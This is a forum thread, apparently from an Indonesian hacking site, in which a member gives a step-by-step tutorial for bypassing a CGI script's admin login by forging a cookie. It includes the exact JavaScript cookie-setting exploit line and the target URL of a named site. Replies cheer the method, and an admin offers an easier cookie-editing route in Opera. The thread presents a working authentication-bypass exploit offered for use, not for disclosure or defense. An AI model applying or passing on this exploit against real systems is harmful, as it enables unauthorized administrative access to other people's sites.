www.sekuritionline.net :: View topic - HowTo Insecure Cookie Handling Vulnerability

SO-AddiCT

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to See Insecure Cookie Handling Vulnerability on Site
Using Tamper Add.On:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

1.
Buka firefox
Install Tamper Data 10.1.0
https://addons.mozilla.org/en-US/firefox/addons/policy/0/966/33806

2.
Tools -> Tamper Data

3.
Open url: http://www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi di firefox

Coba dilihat jendela Tamper Data untuk melihat proses request dan response dari browser kita

4.
klik Start Tamper pada jendela Tamper Data.

Kemudian coba login di site dengan memasukkan username dan password yang tersedia lalu submit

Uncheck Continue Tampering, Klik Tamper

5.
Perhatikan popup dari jendela Tamper Data Klik Ok

Perhatikan kembali jendela Tamper Data

Disini dengan jelas kita bisa melihat variable session yang valid dari user admin yang tersimpan di cookie.

Dari informasi diatas kita bisa mengexploitasi situs tersebut dengan menggunakan perintah JavaScript untuk membuat cookie yang berisi variable diatas pada browser untuk menBypass proses login.

Exploit script : javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";

HOW TO:
1. Buka Firefox (bersihkan cookie di firefox) Tools -> Clear Private Data
2. Buka halaman url diatas : www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi
3. Ganti url dengan script : javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";
4. Ganti kembali dengan url awal : www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi
5. walalalalal ..... xixixixi hal login berhasil terbypasss

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Dedicated : To All noobie like I am Very Happy

# Thanks to : All Admin and SekuritiOnline Moderator and active member
# Object taken from paper[at]http://milw0rm.com/exploits/8687
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_________________
-- Help I'm a Noobtz . . . Plz Guided Me --

SO-MaNiaK

Hiihhihi Mantap Uyy

Teruskan perjuangan..mu
me mah minta yg dah masaknya aja hihii
keep berkereasi..

Diatas Langit Masih Ada LAngit
Regrads,

SO-MaNiaK

wah mantap ni om

Admin SO

wew, sep dibuat juga, me ga sempet buat, ntar aku taruh di depan, nice to share

Admin SO

Sebenernya itu terlalu ribet bikin bingung Cool

coba kalian gunakan Opera

klik Tools >> Preference >> Advanced >> Cookies

Cari Cookies web target dan silahkan edit sesuai kreativitas kamu

ga usah pake yg gitu2an ribet just make simple

Hacking itu seni sama ama Perang gunain yg udah ada di sekitar kamu.
_________________
.:: Letjen Touch The Forum ::.

SO-AddiCT

xixixi namanya juga noobie um en ane ga pernah pake opera sih um... hehehe thks yh um letjen tas info nya...

mao nyuba juga ah pake opera...
_________________
-- Help I'm a Noobtz . . . Plz Guided Me --

Admin SO

SO-AddiCT

SO-MaNiaK

salut....nih hacking jenis kaya gini uda skelas advanced... mantap om...numpang copas di flashdisk..